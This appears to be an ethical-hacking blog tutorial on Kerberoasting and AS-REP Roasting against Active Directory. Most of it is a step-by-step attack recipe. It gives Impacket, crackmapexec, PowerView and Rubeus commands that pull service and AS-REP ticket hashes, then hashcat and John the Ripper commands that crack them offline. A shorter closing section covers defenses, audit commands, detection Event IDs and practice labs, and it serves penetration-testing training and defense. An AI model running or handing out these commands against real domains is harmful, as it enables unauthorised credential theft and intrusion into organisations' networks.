Ethical Hacking #kerberos#active directory#kerberoasting

Kerberoasting and AS-REP Roasting: A Practical Guide

Learn how Kerberoasting and AS-REP Roasting attacks work against Active Directory and how to defend against them.

9 min read

Active Directory environments are a prime target during penetration tests, and Kerberos-based attacks are among the most reliable techniques for obtaining credentials. Kerberoasting and AS-REP Roasting are two distinct but related attacks that exploit weaknesses in how Active Directory handles authentication tickets. Understanding both is essential for AD pentesting.

How Kerberos Authentication Works

Kerberos is the default authentication protocol in Windows Active Directory. At a high level:

  1. The client requests a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC/Domain Controller)
  2. With a TGT, the client requests Service Tickets (TGS) for specific services
  3. Service tickets are encrypted using the service account’s NTLM hash

The vulnerability: service tickets are returned to the requesting user encrypted with the service account’s password hash — meaning any domain user can request a service ticket and attempt to crack it offline.

Kerberoasting

What It Is

Kerberoasting targets service accounts that have a Service Principal Name (SPN) registered. Any authenticated domain user can request service tickets for any SPN. The ticket is encrypted with the service account’s password hash, which you can take offline and crack.

Step 1: Find Kerberoastable Accounts

Use GetUserSPNs.py from Impacket:

python3 GetUserSPNs.py DOMAIN/username:password -dc-ip DC_IP -request

Or with crackmapexec:

crackmapexec ldap DC_IP -u username -p password --kerberoasting output.txt

From a Windows machine (PowerShell):

# PowerView
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname

Step 2: Request the Ticket

Impacket’s GetUserSPNs.py with -request automatically retrieves crackable hashes:

python3 GetUserSPNs.py DOMAIN/user:pass -dc-ip 10.10.10.1 -request -outputfile kerberoast_hashes.txt

Output looks like:

$krb5tgs$23$*sqlsvc$DOMAIN.LOCAL$DOMAIN/sqlsvc*$a4b3c2...

Step 3: Crack the Hash

Use hashcat with mode 13100 (RC4, most common) or 19600 (AES-128) / 19700 (AES-256):

hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

With John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt

AS-REP Roasting

What It Is

AS-REP Roasting targets accounts with Kerberos pre-authentication disabled. Normally, Kerberos requires the client to prove knowledge of the password before receiving a TGT. If pre-authentication is disabled, the KDC returns an AS-REP response encrypted with the user’s password hash — without requiring authentication — which can be cracked offline.

Step 1: Find Vulnerable Accounts

With Impacket (no credentials needed if pre-auth is disabled):

python3 GetNPUsers.py DOMAIN/ -dc-ip DC_IP -usersfile users.txt -no-pass -format hashcat

Or with credentials to query LDAP:

python3 GetNPUsers.py DOMAIN/user:pass -dc-ip DC_IP -request -format hashcat

From Windows with PowerView:

Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

Step 2: Crack the AS-REP Hash

Hashcat mode 18200:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule

Using Rubeus (Windows)

If you have access to a Windows machine on the domain (or have code execution), Rubeus is the go-to tool:

# Kerberoasting
.\Rubeus.exe kerberoast /outfile:hashes.txt

# AS-REP Roasting
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt

Defenses Against These Attacks

Kerberoasting Prevention

  • Use long, complex passwords for service accounts (25+ random characters) — makes cracking infeasible
  • Use Group Managed Service Accounts (gMSA) — passwords are 240-character random strings rotated automatically
  • Audit SPNs regularly: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
  • Enable AES encryption for service accounts — AES tickets are harder to crack than RC4

AS-REP Roasting Prevention

  • Enable Kerberos pre-authentication on all accounts — the default; only disable if a legacy application requires it
  • Audit accounts with pre-auth disabled: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
  • Use strong passwords on any accounts that must have pre-auth disabled

Detection

Both attacks generate detectable Event IDs on Domain Controllers:

Event IDDescription
4769Kerberos Service Ticket requested (watch for RC4 encryption type 0x17)
4768Kerberos TGT requested (AS-REP roasting generates these without pre-auth)

Alert on bulk 4769 events with RC4 encryption from a single source IP, or 4768 events for accounts with DoesNotRequirePreAuth.

Practice Labs

  • HackTheBox: Forest, Active, Sauna (all AD-focused machines)
  • TryHackMe: Attacktive Directory, Post-Exploitation Basics
  • GOAD (Game of Active Directory) — self-hosted vulnerable AD lab

Mastering Kerberoasting and AS-REP Roasting significantly expands your Active Directory attack surface knowledge and is tested heavily on certifications like OSCP, CRTP, and eCPTX.

#windows #pentesting #kerberoasting #active directory #kerberos

// related articles

ethical-hacking Kerbrute: Kerberos User Enumeration and Brute-Forcing 7 min read ethical-hacking Windows Privilege Escalation Guide with WinPEAS 7 min read ethical-hacking Impacket Toolkit: Windows Network Pentesting Guide 7 min read